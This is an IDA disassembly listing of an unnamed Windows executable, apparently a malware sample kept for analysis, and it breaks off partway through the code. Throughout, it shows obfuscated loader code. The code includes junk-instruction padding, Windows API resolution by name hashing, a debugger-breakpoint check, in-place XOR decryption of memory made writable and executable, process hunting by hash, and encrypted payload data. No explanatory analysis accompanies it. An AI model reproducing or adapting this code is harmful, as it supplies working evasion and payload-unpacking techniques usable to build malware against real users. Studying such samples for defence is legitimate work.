;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
;
; +-------------------------------------------------------------------------+
; | This file is generated by The Interactive Disassembler (IDA) |
; | Copyright (c) 2007 by DataRescue sa/nv, <ida@datarescue.com> |
; | Licensed to: 48-377D-7114-93 SRI International, 1 computer, std, 11/2007 |
; +-------------------------------------------------------------------------+
;
; Input MD5 : BA587FA75C89FFD31A1FFEC44D4984FD
; File Name : u:\work\ba587fa75c89ffd31a1ffec44d4984fd_orig.exe
; Format : Portable executable for 80386 (PE)
; Imagebase : 400000
; Section 1. (virtual address 00001000)
; Virtual size : 00002896 ( 10390.)
; Section size in file : 00002A00 ( 10752.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
include uni.inc ; see unicode subdir of ida for info on unicode
.686p
.mmx
.model flat
; ===========================================================================
; Segment type: Pure code
; Segment permissions: Read/Execute
_text segment para public 'CODE' use32
assume cs:_text
;org 401000h
assume es:nothing, ss:nothing, ds:_data, fs:nothing, gs:nothing
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401000 proc near ; DATA XREF: sub_4010E7+55�o
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
add esp, 0FFFFFFF0h
lea eax, dword_405004
push dword ptr [eax]
push dword ptr [eax+4]
push dword ptr [eax+8]
mov eax, [ebp+arg_8]
pop dword ptr [eax+0B4h]
pop dword ptr [eax+0C4h]
pop dword ptr [eax+0B8h]
xor eax, eax
leave
retn
sub_401000 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40102D proc near ; CODE XREF: sub_401774+4C�p
; sub_4018EF+64�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
pusha
mov ch, 0BBh
push [ebp+arg_0]
pop edi
mov cl, dl
mov bl, bl
mov edx, 2Ch
mov ebx, 0
mov ch, dl
mov ecx, ecx
push 0
pop ecx
mov edx, esi
loc_401051: ; CODE XREF: sub_40102D+39�j
xor cl, [edi]
xor bl, [edi]
jmp short loc_40105A
; ---------------------------------------------------------------------------
loc_401057: ; CODE XREF: sub_40102D+30�j
sub cl, 20h
loc_40105A: ; CODE XREF: sub_40102D+28�j
cmp cl, 20h
jnb short loc_401057
rol ebx, cl
inc edi
mov dl, [edi]
or dl, dl
jnz short loc_401051
xor ebx, 9000h
push ebx
pop [ebp+var_4]
popa
push [ebp+var_4]
pop eax
leave
retn 4
sub_40102D endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40107C proc near ; CODE XREF: StartAddress+6F�p
; sub_40134A+66�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov dl, 0BCh
cld
mov ecx, esi
push [ebp+arg_0]
pop edi
mov edx, 91h
mov ebx, ebx
mov dl, 0B7h
push [ebp+arg_4]
pop ecx
mov dh, dl
mov dl, 0B7h
shr ecx, 2
mov edx, 0F3h
push 0
pop eax
mov bh, bl
mov edx, 0A4h
mov ebx, 68h
mov dl, bl
rep stosd
mov bh, bh
mov ebx, edx
mov ebx, 9Bh
push [ebp+arg_4]
pop ecx
mov ebx, 0AEh
mov edx, ebx
mov bh, 93h
mov bh, 16h
and ecx, 3
mov bl, 6
mov ebx, 0C1h
mov ebx, edx
rep stosb
mov ecx, edx
mov edi, 0F4h
popa
leave
retn 8
sub_40107C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4010E7 proc near ; CODE XREF: sub_40173B+2F�p
hObject = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFFFCh
cmp dword_405018, 0
jnz locret_4011A3
pusha
push [ebp+arg_0]
pop eax
mov dl, 0E3h
mov cl, 66h
mov ebx, 2Ch
mov byte ptr [eax], 0
mov ecx, 7Ch
mov dl, 75h
mov edi, 97h
sub eax, 4
mov esi, 0DEh
mov dh, 0A0h
mov dh, 38h
push dword ptr [eax]
pop ebx
mov ecx, edx
mov dl, 0B5h
push ebx
pop [ebp+hObject]
mov esi, edx
mov edx, edi
mov dl, dl
mov ch, ch
mov ch, 0DEh
or ebx, ebx
jz short loc_40119C
push offset sub_401000
push large dword ptr fs:0
mov large fs:0, esp
mov dword_405004, offset loc_401192
mov dword_40500C, ebp
mov dword_405008, esp
mov ecx, edi
mov dl, 3Bh
mov esi, 2Ah
push 0FFFFFFFFh ; dwMilliseconds
push [ebp+hObject] ; hHandle
call WaitForSingleObject ; WaitForSingleObject
mov cl, dh
mov edi, ecx
mov dh, 0DBh
push [ebp+hObject] ; hObject
call CloseHandle ; CloseHandle
mov edx, 0C5h
mov ecx, edx
mov ecx, 0E3h
loc_401192: ; DATA XREF: sub_4010E7+68�o
pop large dword ptr fs:0
add esp, 4
loc_40119C: ; CODE XREF: sub_4010E7+53�j
mov ecx, edi
mov dh, cl
mov dh, 0F9h
popa
locret_4011A3: ; CODE XREF: sub_4010E7+D�j
leave
retn 4
sub_4010E7 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; DWORD __stdcall StartAddress(LPVOID)
StartAddress proc near ; CODE XREF: sub_401501+60�p
; DATA XREF: sub_401501+36�o
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
mov ecx, offset dword_405010
mov eax, 1
lock xadd [ecx], eax
inc eax
cmp dword_405018, 0
jnz short loc_4011F8
mov edi, 58h
mov bh, 0E4h
mov edx, 24h
mov edi, edi
lea esi, [ebp+var_108]
mov dh, dl
mov ecx, ebx
mov ecx, edi
mov ch, 73h
mov edi, 0C6h
add esi, 4
mov cl, 0B5h
mov bl, 43h
mov ebx, edx
mov ebx, edx
mov bl, 33h
jmp short loc_401200
; ---------------------------------------------------------------------------
loc_4011F8: ; CODE XREF: StartAddress+1F�j
mov dl, 0C2h
lea esi, dword_405028
loc_401200: ; CODE XREF: StartAddress+4F�j
mov bh, ch
mov ebx, 2Fh
mov edx, 39h
mov ebx, edi
mov ebx, ebx
push 0C8h
push esi
call sub_40107C
mov eax, [ebp+arg_0]
push dword ptr [eax]
pop edi
mov ch, bh
mov bh, dh
mov ebx, 2Fh
push 0
pop eax
mov edx, 0C3h
mov dl, bh
mov ecx, 0D3h
mov bh, dh
mov dh, 0ACh
mov ebx, 82h
mov al, [edi+1]
mov bh, cl
mov edx, 0E9h
mov ch, cl
mov [ebp+var_4], eax
mov edx, ecx
mov ecx, 14h
mov cl, cl
mov bl, 1Eh
mov ah, [edi]
mov ebx, 7
add edi, 2
mov ebx, edx
mov bl, dl
mov edx, 0CAh
mov ebx, ebx
mov ebx, ebx
mov ebx, edx
loc_401275: ; CODE XREF: StartAddress+10E�j
mov al, [edi]
mov dh, 0F6h
mov dh, bl
mov dl, bh
xor al, ah
mov bl, 22h
mov [esi], al
mov bl, 48h
mov edx, 72h
mov edx, 17h
mov ebx, ebx
mov bh, bl
xor al, ah
mov edx, 0F2h
rol ah, 2
mov dh, 5Ah
mov dh, dl
mov dh, bh
inc esi
mov edx, ebx
mov ebx, 5Ch
inc edi
dec [ebp+var_4]
mov dl, 5Ah
cmp [ebp+var_4], 0
jnz short loc_401275
mov ebx, edx
mov bl, 5Fh
cmp dword_405018, 0
jnz short loc_401336
mov edx, 0F0h
mov bh, bh
mov edx, ecx
mov ebx, 59h
mov edi, [ebp+arg_0]
mov bh, dh
mov esi, ecx
mov bl, 0Bh
lea eax, [ebp+var_108]
mov bh, ch
mov ecx, 0BBh
add eax, 4
mov [edi], eax
mov ebx, 81h
mov bl, 92h
mov ebx, 95h
mov ch, 6Fh
mov cl, bl
loc_4012FD: ; CODE XREF: StartAddress+181�j
mov dl, bh
push 0Ah ; dwMilliseconds
call Sleep ; Sleep
mov edi, 0BDh
mov dl, ch
mov al, [ebp+var_104]
mov bl, ch
mov bl, 86h
mov esi, edx
mov bh, 25h
mov dh, bl
or al, al
jz short loc_40132A
cmp dword_405014, 0
jbe short loc_4012FD
loc_40132A: ; CODE XREF: StartAddress+178�j
mov edx, ecx
mov dl, dh
mov dh, bl
mov edi, edi
mov ch, cl
mov dh, bl
loc_401336: ; CODE XREF: StartAddress+11B�j
push offset dword_405010
pop ecx
mov eax, 0FFFFFFFFh
lock xadd [ecx], eax
dec eax
leave
retn 4
StartAddress endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40134A proc near ; CODE XREF: sub_401501+72�p
var_108 = byte ptr -108h
var_104 = byte ptr -104h
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
add esp, 0FFFFFEF8h
push offset dword_405010
pop ecx
mov eax, 1
lock xadd [ecx], eax
inc eax
mov bh, 43h
mov ebx, edx
mov ebx, ecx
cmp dword_405018, 0
jnz short loc_401387
mov ecx, ecx
lea esi, [ebp+var_108]
mov bh, 2Fh
mov cl, ch
mov dh, 0B3h
mov ch, 4Eh
add esi, 4
jmp short loc_40139D
; ---------------------------------------------------------------------------
loc_401387: ; CODE XREF: sub_40134A+26�j
mov ch, 0BCh
mov dl, 8Dh
mov edi, 0FAh
mov dl, 19h
mov ebx, 41h
lea esi, byte_405435
loc_40139D: ; CODE XREF: sub_40134A+3B�j
mov dl, 4Eh
mov dh, dh
mov dh, dh
mov edi, 0F8h
mov ecx, edx
push 0C8h
push esi
call sub_40107C
mov ebx, ecx
mov eax, [ebp+arg_0]
mov bh, dl
mov ch, 58h
mov ch, 91h
mov edx, ebx
mov ecx, edi
mov ecx, ecx
mov edi, [eax]
mov bl, 71h
mov eax, 0
mov ecx, ecx
mov al, [edi+1]
push eax
pop [ebp+var_4]
mov cl, bl
mov dl, 8Dh
mov ah, [edi]
mov dl, dh
mov bl, 3Ch
mov ebx, ebx
add edi, 2
mov edx, 9
mov bl, 0ABh
mov dh, 92h
loc_4013F0: ; CODE XREF: sub_40134A+10C�j
mov al, [edi]
mov ebx, edx
mov edx, 7Bh
mov ebx, 0ADh
mov dl, bl
mov ebx, edx
mov bh, 96h
xor al, ah
mov ebx, ebx
mov dl, dh
mov [esi], al
mov bh, dl
mov ebx, ebx
mov edx, edx
mov dl, 34h
mov dl, dh
xor al, ah
mov ebx, 0E1h
mov bh, 0B0h
mov ebx, 0DCh
rol ah, 2
mov ebx, 0C6h
inc esi
mov dl, dh
mov bl, 0AAh
inc edi
mov ebx, 0B5h
mov ebx, 67h
mov ebx, 2Fh
dec [ebp+var_4]
mov bl, 5Bh
mov ebx, 0F2h
mov edx, 0ADh
mov bl, 0DAh
cmp [ebp+var_4], 0
jnz short loc_4013F0
mov bh, 57h
mov dh, 43h
mov dh, 0A0h
cmp dword_405018, 0
jnz loc_4014EE
mov esi, edx
mov dh, bl
mov edx, ebx
mov dh, ch
mov ebx, 0Fh
push [ebp+arg_0]
pop edi
mov dl, bl
lea eax, [ebp+var_108]
mov bl, 62h
mov esi, ebx
mov ecx, ecx
mov dl, 0B0h
mov ebx, 0A5h
add eax, 4
mov ch, bh
push eax
pop dword ptr [edi]
mov cl, 68h
mov cl, bh
mov bh, 0F7h
mov bl, 0B5h
mov edi, edx
mov ch, 0B6h
mov cl, 0E1h
mov dh, 0E7h
mov ecx, ecx
loc_4014AB: ; CODE XREF: sub_40134A+194�j
mov dl, 48h
push 0Ah ; dwMilliseconds
call Sleep ; Sleep
mov ecx, 0D1h
mov dh, 0CDh
mov esi, 83h
mov ecx, 0C0h
mov dl, 0DFh
mov al, [ebp+var_104]
mov bh, 58h
mov cl, cl
mov edi, esi
or al, al
jz short loc_4014E0
cmp dword_405014, 0
jbe short loc_4014AB
loc_4014E0: ; CODE XREF: sub_40134A+18B�j
mov bl, 0E7h
mov edi, 9Eh
mov esi, 11h
mov bl, 0AEh
loc_4014EE: ; CODE XREF: sub_40134A+11B�j
mov ecx, offset dword_405010
mov eax, 0FFFFFFFFh
lock xadd [ecx], eax
dec eax
leave
retn 4
sub_40134A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401501 proc near ; CODE XREF: sub_40173B+D�p
; sub_402E17+63�p ...
lpThreadId = dword ptr -0Ch
var_8 = dword ptr -8
Parameter = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF4h
pusha
mov dword_405014, 0
push [ebp+arg_0]
pop eax
push eax
pop [ebp+Parameter]
push 0
pop [ebp+var_8]
lea eax, [ebp+var_8]
mov [ebp+lpThreadId], eax
lea eax, [ebp+Parameter]
cmp dword_405018, 0
jnz short loc_40155A
push [ebp+lpThreadId] ; lpThreadId
push 0 ; dwCreationFlags
push eax ; lpParameter
push offset StartAddress ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread ; CreateThread
mov [ebp+var_8], eax
loc_401548: ; CODE XREF: sub_401501+55�j
push 0 ; dwMilliseconds
call Sleep ; Sleep
push [ebp+arg_0]
pop eax
cmp [ebp+Parameter], eax
jz short loc_401548
jmp short loc_401582
; ---------------------------------------------------------------------------
loc_40155A: ; CODE XREF: sub_401501+2E�j
cmp [ebp+arg_4], 0
jnz short loc_401572
push eax ; LPVOID
call StartAddress
lea eax, dword_405028
push eax
pop [ebp+Parameter]
jmp short loc_401582
; ---------------------------------------------------------------------------
loc_401572: ; CODE XREF: sub_401501+5D�j
push eax
call sub_40134A
lea eax, byte_405435
push eax
pop [ebp+Parameter]
loc_401582: ; CODE XREF: sub_401501+57�j
; sub_401501+6F�j
mov eax, [ebp+Parameter]
sub eax, 4
push [ebp+var_8]
pop ebx
mov [eax], ebx
popa
push [ebp+Parameter]
pop eax
leave
retn 8
sub_401501 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
push dword ptr [ebp+8]
call GlobalFree ; GlobalFree
popa
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_4015A8(LPVOID lpAddress, SIZE_T dwSize, int)
sub_4015A8 proc near ; CODE XREF: sub_401647+22�p
lpAddress = dword ptr 8
dwSize = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push edx
push offset flOldProtect ; lpflOldProtect
push 40h ; flNewProtect
push [ebp+dwSize] ; dwSize
push [ebp+lpAddress] ; lpAddress
call VirtualProtect ; VirtualProtect
mov eax, [ebp+lpAddress]
mov ecx, 0
nop
mov ebx, [ebp+arg_8]
loc_4015CD: ; CODE XREF: sub_4015A8+49�j
mov dh, [eax]
inc eax
nop
push eax
push 0
pop eax
pop eax
mov dl, [eax]
push edx
mov edx, 0
pop edx
xor dh, dl
mov [ebx], dh
inc ebx
nop
push ebx
mov ebx, 0
pop ebx
inc eax
inc ecx
cmp ecx, [ebp+dwSize]
jb short loc_4015CD
pop edx
pop ecx
pop ebx
pop eax
leave
retn 0Ch
sub_4015A8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_4015FB(LPVOID lpAddress, SIZE_T dwSize, char)
sub_4015FB proc near ; CODE XREF: sub_40162B+12�p
lpAddress = dword ptr 8
dwSize = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
pusha
push offset flOldProtect ; lpflOldProtect
push 40h ; flNewProtect
push [ebp+dwSize] ; dwSize
push [ebp+lpAddress] ; lpAddress
call VirtualProtect ; VirtualProtect
mov ecx, [ebp+lpAddress]
mov edx, [ebp+dwSize]
mov al, [ebp+arg_8]
loc_40161A: ; CODE XREF: sub_4015FB+29�j
mov ah, [ecx]
xor ah, al
mov [ecx], ah
inc ecx
dec edx
or edx, edx
jnz short loc_40161A
popa
leave
retn 0Ch
sub_4015FB endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __stdcall sub_40162B(int, SIZE_T dwSize)
sub_40162B proc near ; CODE XREF: sub_401B6C+9B�p
arg_0 = dword ptr 8
dwSize = dword ptr 0Ch
push ebp
mov ebp, esp
pusha
mov edx, [ebp+arg_0]
mov al, [edx]
mov ecx, [ebp+arg_0]
inc ecx
push eax ; char
push [ebp+dwSize] ; dwSize
push ecx ; lpAddress
call sub_4015FB
popa
leave
retn 8
sub_40162B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401647 proc near ; CODE XREF: sub_401673+21�p
; sub_401D07+34�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
pusha
push [ebp+arg_8]
push [ebp+arg_4]
call sub_40107C
mov eax, [ebp+arg_0]
inc eax
mov ecx, 0
mov cx, [eax]
inc eax
inc eax
push [ebp+arg_4] ; int
push ecx ; dwSize
push eax ; lpAddress
call sub_4015A8
popa
leave
retn 0Ch
sub_401647 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_401673(LPVOID)
sub_401673 proc near ; DATA XREF: sub_4016B4+14�o
arg_0 = dword ptr 8
push ebp
mov ebp, esp
push eax
push ebx
push ecx
push edx
push 0Ah ; dwMilliseconds
call Sleep ; Sleep
mov eax, [ebp+arg_0]
xor eax, 101h
push 400h
push offset word_405842
push eax
call sub_401647
loc_401699: ; CODE XREF: .text:004016AA�j
push 3E8h ; dwMilliseconds
call Sleep ; Sleep
push 0 ; dwExitCode
call ExitThread ; ExitThread
sub_401673 endp
; ---------------------------------------------------------------------------
jmp short loc_401699
; ---------------------------------------------------------------------------
pop edx
pop ecx
pop ebx
pop eax
leave
retn 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4016B4 proc near ; CODE XREF: sub_401B6C+22�p
; sub_401B6C+4E�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
pusha
mov eax, [ebp+arg_0]
xor eax, 101h
push offset ThreadId ; lpThreadId
push 0 ; dwCreationFlags
push eax ; lpParameter
push offset sub_401673 ; lpStartAddress
push 0 ; dwStackSize
push 0 ; lpThreadAttributes
call CreateThread ; CreateThread
push 32h ; dwMilliseconds
call Sleep ; Sleep
popa
leave
retn 4
sub_4016B4 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push ebx
push ecx
xor ecx, ecx
mov eax, [ebp+8]
mov dl, [ebp+10h]
loc_4016EF: ; CODE XREF: .text:00401702�j
mov bh, [eax]
xor bh, cl
rol bh, 4
rol dl, 3
xor bh, dl
mov [eax], bh
inc eax
inc ecx
cmp ecx, [ebp+0Ch]
jb short loc_4016EF
pop ecx
pop ebx
leave
retn 0Ch
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
pusha
mov ecx, 0
mov eax, [ebp+8]
add eax, [ebp+14h]
mov edx, 0
mov dl, [ebp+10h]
loc_401721: ; CODE XREF: .text:00401734�j
mov bh, [eax]
rol dl, 3
xor bh, dl
ror bh, 4
xor bh, cl
mov [eax], bh
inc eax
inc ecx
cmp ecx, [ebp+0Ch]
jb short loc_401721
popa
leave
retn 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40173B proc near ; CODE XREF: sub_401814+24�p
; sub_401814+4E�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFF8h
mov eax, [ebp+arg_0]
inc eax
push 1
push eax
call sub_401501
mov [ebp+var_4], eax
push eax ; lpLibFileName
call LoadLibraryA ; LoadLibraryA
mov [ebp+var_8], eax
push [ebp+arg_4]
push [ebp+var_8]
call sub_401774
push eax
push [ebp+var_4]
pop eax
push eax
call sub_4010E7
pop eax
leave
retn 8
sub_40173B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401774 proc near ; CODE XREF: sub_40173B+24�p
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
add esp, 0FFFFFFECh
pusha
mov ebx, [ebp+arg_0]
push 0
pop [ebp+var_14]
mov eax, [ebx+3Ch]
cmp word ptr [eax+ebx], 4550h
jnz short loc_40180A
mov ecx, [eax+ebx+78h]
or ecx, ecx
jz short loc_40180A
add ecx, ebx
mov edx, [ecx+18h]
push dword ptr [ecx+1Ch]
pop eax
push dword ptr [ecx+20h]
pop esi
mov edi, [ecx+24h]
add eax, ebx
push edx
pop [ebp+var_8]
add edi, ebx
push eax
pop [ebp+var_10]
push edi
pop [ebp+var_C]
add esi, ebx
mov [ebp+var_4], edx
loc_4017BB: ; CODE XREF: sub_401774+5E�j
mov ecx, [esi]
add ecx, ebx
push ecx
call sub_40102D
push eax
pop edx
cmp edx, [ebp+arg_4]
jz short loc_4017D6
add esi, 4
dec [ebp+var_4]
jnz short loc_4017BB
jmp short loc_40180A
; ---------------------------------------------------------------------------
loc_4017D6: ; CODE XREF: sub_401774+56�j
push [ebp+var_8]
pop eax
mov edx, [ebp+var_C]
sub eax, [ebp+var_4]
mov edx, [edx+eax*2]
mov eax, [ebp+var_10]
and edx, 0FFFFh
mov edx, [eax+edx*4]
add edx, ebx
mov eax, 0
mov al, [edx]
xor eax, 9000h
cmp eax, 90CCh
jnz short loc_401806
xor edx, eax
loc_401806: ; CODE XREF: sub_401774+8E�j
push edx
pop [ebp+var_14]
loc_40180A: ; CODE XREF: sub_401774+18�j
; sub_401774+20�j ...
popa
mov eax, [ebp+var_14]
leave
retn 8
sub_401774 endp
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_401814 proc near ; CODE XREF: sub_4026F2+FC�p
; sub_4026F2+15B�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
jmp short loc_401824
; ---------------------------------------------------------------------------
byte_401819 db 0, 19h, 8 ; DATA XREF: sub_401814+1F�o
; sub_401814+49�o ...
dd 28E30172h, 74A2087Ch
; ---------------------------------------------------------------------------
loc_401824: ; CODE XREF: sub_401814+3�j
jmp short loc_40182A
; ---------------------------------------------------------------------------
dword_401826 dd 0D0D422FEh ; sub_401814+43�r ...
; ---------------------------------------------------------------------------
loc_40182A: ; CODE XREF: sub_401814:loc_401824�j
push [ebp+arg_4]
push ds:dword_401826
push offset byte_401819
call sub_40173B
call eax
push eax
pop dword_41E858
mov dword_41E85C, eax
cmp eax, 0
jz loc_4018D8
push [ebp+arg_0]
push ds:dword_401826
push offset byte_401819
call sub_40173B
call eax
mov dword_41E860, eax
inc dword_41E860
cmp eax, 0
jz short loc_4018D8
loc_401879: ; CODE XREF: sub_401814+C2�j
jmp short loc_40187F
; ---------------------------------------------------------------------------
dword_40187B dd 0D4BCE432h ; sub_4026F2+173�r
; ---------------------------------------------------------------------------
loc_40187F: ; CODE XREF: sub_401814:loc_401879�j
push dword_41E860
push [ebp+arg_4]
push offset dword_41E864
push ds:dword_40187B
push offset byte_401819
call sub_40173B
call eax
jmp short loc_4018A5
; ---------------------------------------------------------------------------
dword_4018A1 dd 0DF5C91CEh ; sub_401D07+C3�r
; ---------------------------------------------------------------------------
loc_4018A5: ; CODE XREF: sub_401814+8B�j
push offset dword_41E864
push [ebp+arg_0]
push ds:dword_4018A1
push offset byte_401819
call sub_40173B
call eax
cmp eax, 0
jz short loc_4018DD
cmp dword_41E85C, 0
jz short loc_4018D8
dec dword_41E85C
inc [ebp+arg_4]
jmp short loc_401879
; ---------------------------------------------------------------------------
loc_4018D8: ; CODE XREF: sub_401814+3A�j
; sub_401814+63�j ...
push 0
pop eax
jmp short locret_4018EB
; ---------------------------------------------------------------------------
loc_4018DD: ; CODE XREF: sub_401814+AE�j
push dword_41E858
pop eax
sub eax, dword_41E85C
inc eax
locret_4018EB: ; CODE XREF: sub_401814+C7�j
leave
retn 8
sub_401814 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4018EF proc near ; CODE XREF: sub_401B6C+8�p
; sub_402A4C+35�p ...
arg_0 = dword ptr 8
push ebp
mov ebp, esp
jmp short loc_4018F8
; ---------------------------------------------------------------------------
dword_4018F4 dd 0E66E3AD5h ; ---------------------------------------------------------------------------
loc_4018F8: ; CODE XREF: sub_4018EF+3�j
push 0
push 2
push ds:dword_4018F4
push offset byte_401819
call sub_40173B
call eax
cmp eax, 0FFFFFFFFh
jz locret_4019C6
mov dword_41E969, eax
mov dword_41E96D, 128h
jmp short loc_40192C
; ---------------------------------------------------------------------------
dword_401928 dd 8B2869EFh ; ---------------------------------------------------------------------------
loc_40192C: ; CODE XREF: sub_4018EF+37�j
push offset dword_41E96D
push dword_41E969
push ds:dword_401928
push offset byte_401819
call sub_40173B
call eax
cmp eax, 1
jnz short locret_4019C6
loc_40194E: ; CODE XREF: sub_4018EF+B8�j
push offset byte_41E991
call sub_40102D
cmp eax, [ebp+arg_0]
jnz short loc_401982
jmp short loc_401963
; ---------------------------------------------------------------------------
dword_40195F dd 0E3EC403Ch ; sub_4018EF+C0�r ...
; ---------------------------------------------------------------------------
loc_401963: ; CODE XREF: sub_4018EF+6E�j
push dword_41E969
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
mov eax, dword_41E975
jmp short locret_4019C6
; ---------------------------------------------------------------------------
loc_401982: ; CODE XREF: sub_4018EF+6C�j
jmp short loc_401988
; ---------------------------------------------------------------------------
dword_401984 dd 34F9BA83h ; ---------------------------------------------------------------------------
loc_401988: ; CODE XREF: sub_4018EF:loc_401982�j
push offset dword_41E96D
push dword_41E969
push ds:dword_401984
push offset byte_401819
call sub_40173B
call eax
or eax, eax
jnz short loc_40194E
push dword_41E969
push ds:dword_40195F
push offset byte_401819
call sub_40173B
call eax
mov eax, 0
locret_4019C6: ; CODE XREF: sub_4018EF+22�j
; sub_4018EF+5D�j ...
leave
retn 4
sub_4018EF endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push esi
push edi
push ecx
push eax
cld
mov esi, [ebp+8]
push dword ptr [ebp+0Ch]
pop edi
push dword ptr [ebp+10h]
pop ecx
rep movsb
pop eax
pop ecx
pop edi
pop esi
leave
retn 0Ch
; ---------------------------------------------------------------------------
byte_4019E7 db 0 ; DATA XREF: sub_401B6C+49�o
dd 8EDD0049h, 0E1A76629h, 80D72A7Eh, 0F3A13F7Eh, 0D28EAFEAh
dd 24576326h, 0BACEF89Dh, 0FBB5401Ch, 0C7A35A35h, 0A6E5C19Dh
dd 285AF88Dh, 30555624h, 97DACC2h, 0D5B03B6Dh, 0A9DA5C2Eh
dd 8DE21D74h, 217D016Fh, 78173875h, 0C5B00460h, 0D9BC81EDh
dd 5D016D1Eh, 317CD697h, 753B4C03h, 1043336Fh, 1E6AC8ADh
dd 543DC6B2h, 0BCDB99F7h, 8BD7A8DBh, 7619BDFEh, 0DABCC8A6h
dd 97F0751Ch, 0E8D83F0Fh, 306CDFEFh, 3D580152h, 0AEDA2652h
dd 0C8A685ECh, 0B7C40661h
dword_401A7C dd 98000300h, 790870FDh ; sub_401B6C+87�o
; ---------------------------------------------------------------------------
sbb bh, cl ; DATA XREF: sub_401B6C+96�o
; sub_401B6C+AB�o
retf
; ---------------------------------------------------------------------------
db 0F9h
dd 0F9A5F9F9h, 0F99CF9BDh, 0F990F98Fh, 0F99CF99Ah, 0F9B1F9A5h
dd 0F98BF998h, 0F99DF99Dh, 0F98AF990h, 0F9AFF992h, 0F995F996h
dd 0F994F98Ch, 0F9C8F99Ch, 0F9F9F9A5h, 0F9F9F9F9h, 0F9CBF9F8h
dd 0F9A5F9F9h, 0F99CF9BDh, 0F990F98Fh, 0F99CF99Ah, 0F9B1F9A5h
dd 0F98BF998h, 0F99DF99Dh, 0F98AF990h, 0F9AFF992h, 0F995F996h
dd 0F994F98Ch, 0F9CBF99Ch, 0F9F9F9A5h, 0F9F9F9F9h, 0F9CBF9F8h
dd 0F9A5F9F9h, 0F99CF9BDh, 0F990F98Fh, 0F99CF99Ah, 0F9B1F9A5h
dd 0F98BF998h, 0F99DF99Dh, 0F98AF990h, 0F9AFF992h, 0F995F996h
dd 0F994F98Ch, 0F9CAF99Ch, 0F9F9F9A5h, 0F9F9F9F9h, 606F9F8h
dd 606h
dword_401B40 dd 9798675Dh ; ---------------------------------------------------------------------------
jmp short loc_401B4A
; ---------------------------------------------------------------------------
dword_401B46 dd 4C218301h ; sub_40220E+196�r ...
; ---------------------------------------------------------------------------
loc_401B4A: ; CODE XREF: .text:00401B44�j
push 28h
push ds:dword_401B46
push offset byte_401819
call sub_40173B
call eax
mov ecx, dword_41EAA1
push ecx
pop dword_41EAA5
retn
; =============== S U B R O U T I N E =======================================
sub_401B6C proc near ; CODE XREF: start+D�p
mov eax, ds:dword_401B40
xor al, 15h
push eax
call sub_4018EF
cmp eax, 0
jbe locret_401CCA
push eax
pop dword_41EA9D
push offset dword_401A7C
call sub_4016B4
jmp short loc_401B99
; ---------------------------------------------------------------------------
dword_401B95 dd 6D35E8E8h ; sub_4026F2+17�r ...
; ---------------------------------------------------------------------------
loc_401B99: ; CODE XREF: sub_401B6C+27�j
push offset word_405842
push offset byte_41EAA9
push ds:dword_401B95
push offset byte_401819
call sub_40173B
call eax ; dword_401B40
push offset byte_4019E7
call sub_4016B4
jmp short loc_401BCC
; ---------------------------------------------------------------------------
byte_401BC1 db 0, 57h, 8 ; DATA XREF: sub_401B6C+7B�o
; sub_401B6C+C5�o ...
